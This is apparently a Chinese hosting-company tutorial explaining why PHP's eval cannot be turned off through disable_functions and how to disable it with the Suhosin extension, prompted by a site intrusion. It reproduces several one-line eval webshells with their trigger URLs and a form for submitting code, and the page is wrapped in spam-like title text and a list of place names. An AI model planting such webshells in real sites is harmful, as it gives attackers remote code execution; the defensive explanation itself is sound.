91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

php如何才能禁止eval

發布時間:2021-07-21 16:37:10 來源:億速云 閱讀:280 作者:chen 欄目:編程語言

本篇內容主要講解“php如何才能禁止eval”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“php如何才能禁止eval”吧!

之前網站收到黑客攻擊,我們才知道php的eval函數具有很大的安全隱患。今天我們就來介紹一下禁止eval的方法,有需要的可以參考參考。

前段時間,網站遭受了黑客的入侵,后來在排查中發現了一個php,里面的內容只有很少:

php如何才能禁止eval

<?php eval($_POST[asda123131323156341]);?>

然后網上搜索一下php的eval函數,發現這個eval函數帶有很大的安全隱患。

本地測試一下,在本地環境寫一個php,內容如下:

default.php:

<?php eval($_GET[asda]);?>

然后訪問一下:localhost/test/default.php?asda=phpinfo();

就可以看到已經把phpinfo給執行了。

或者是訪問localhost/test/default.php?asda = echo 11111;同樣也會發現1111被echo出來了。

類似的手段還有:

<?php $code="${${eval($_GET[c])}}";?>

訪問localhost/test/default.php?c=phpinfo();即可看到

<?php
$code=addslashes($_GET[c]);
eval(""$code""); 
?>

訪問localhost/test/default.php?c= ${${phpinfo()}};即可看到

利用可以執行php的eval函數,黑客可以用這個來上傳一些后臺木馬,比如說上傳php,然后通過url訪問這個php來獲得更大的權限。這種稱為一句話木馬的入侵。比如說:寫一個html,內容如下:

<html> 
<body> 
<form action="default.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

然后寫一個default.php,內容為:</>

<?php eval($_POST[c]);?>

這樣的話,想執行什么php就可以直接提交運行即可。

所以: eval()對于php安全來說具有很大的殺傷力,eval函數減弱了你的應用的安全性,因此一般不用的情況下為了防止類似如下的一句話木馬入侵,需要禁止!

然而網上很多說使用disable_functions禁止掉eval的方法都是錯誤的!

其實eval()是無法用php.ini中的disable_functions禁止掉的 :

because eval() is a language construct and not a function

eval是zend的,因此不是PHP_FUNCTION 函數;

那么php怎么禁止eval呢?

如果想禁掉eval可以用php的擴展 Suhosin:

安裝Suhosin后在php.ini中load進來Suhosin.so,再加上suhosin.executor.disable_eval = on即可!

總結,php的eval函數在php中是無法禁用的,因此我們也只有使用插件了!

至于安裝suhosin來禁止eval函數的步驟為:(未測試)

說明:

php安裝目錄:/usr/local/php5

php.ini配置文件路徑:/usr/local/php5/etc/php.ini

Nginx安裝目錄:/usr/local/nginx

Nginx網站根目錄:/usr/local/nginx/html

1、安裝編譯工具

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2、安裝suhosin

cd /usr/local/src   #進入軟件包存放目錄
wget  http://download.suhosin.org/suhosin-0.9.33.tgz    #下載
tar zxvf suhosin-0.9.33.tgz   #解壓
cd suhosin-0.9.33   #進入安裝目錄
/usr/local/php5/bin/phpize   #用phpize生成configure配置文件
./configure  --with-php-config=/usr/local/php5/bin/php-config   #配置
make   #編譯
make install   #安裝
安裝完成之后,出現下面的界面,記住以下路徑,后面會用到。
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/   #suhosin模塊路徑

3、配置php支持suhosin

vi /usr/local/php5/etc/php.ini  
 #編輯配置文件,在最后一行添加以下內容 
extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so
suhosin.executor.disable_eval = on

注意:suhosin.executor.disable_eval = on 的作用就是禁用eval函數

4、測試

vi /usr/local/nginx/html/phpinfo.php    #編輯

<?php
phpinfo();
?>

:wq!  #保存退出

service php-fpm restart   #重啟php-fpm

service nginx restart   #重啟nginx

注意:如果是apache的話也是一樣的,重啟apache即可。

瀏覽器打開phpinfo.php 如下圖所示,可以看到suhosin相關信息

php如何才能禁止eval

至此,Linux下php安裝suhosin安裝完成!

注意:禁用了 eval后,會有啥后果呢? 首先是代碼里使用 eval 的軟件將不能使用比如大名鼎鼎的 Discuz! 論壇和 PHPWind論壇將不能正常使用,也影響到phpMyAdmin的舊版本,如果更新到目前最新的3.2.5,就可以使用,只是默認有個警告的提示,在 config.inc.php 中加上 $cfg['SuhosinDisableWarning']=true;

就可以取消這個警告了。

注意:除了eval之外,還有assert也是類似的用法。

到此,相信大家對“php如何才能禁止eval”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

php
AI

鹤壁市| 张家川| 石嘴山市| 大丰市| 韶关市| 阳山县| 醴陵市| 洛南县| 淮滨县| 忻州市| 阳城县| 娄底市| 北票市| 镇平县| 谢通门县| 抚州市| 绥江县| 诸城市| 阿克陶县| 天津市| 鲁山县| 宜宾市| 九龙城区| 喀喇| 渝中区| 吴忠市| 长宁县| 罗定市| 聊城市| 泸定县| 宁津县| 阳信县| 西乌珠穆沁旗| 图木舒克市| 彰化县| 青铜峡市| 河池市| 沈阳市| 札达县| 沛县| 疏勒县|